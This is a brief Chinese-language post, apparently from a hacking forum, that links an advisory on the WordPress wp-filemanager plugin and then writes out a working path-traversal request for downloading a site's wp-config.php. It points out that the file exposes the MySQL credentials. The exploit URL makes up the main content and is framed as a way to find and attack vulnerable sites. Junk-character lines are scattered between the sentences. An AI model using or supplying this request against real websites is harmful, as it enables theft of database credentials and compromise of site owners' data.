洞详解:http://packetstormsecurity.com/f ... -File-Download.html
9 }* s: U% Y, I# ] 1 U: @" c) U9 s' t; a5 w. K
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。
* K) x8 G" o7 S! t8 D+ P2 G6 t- T |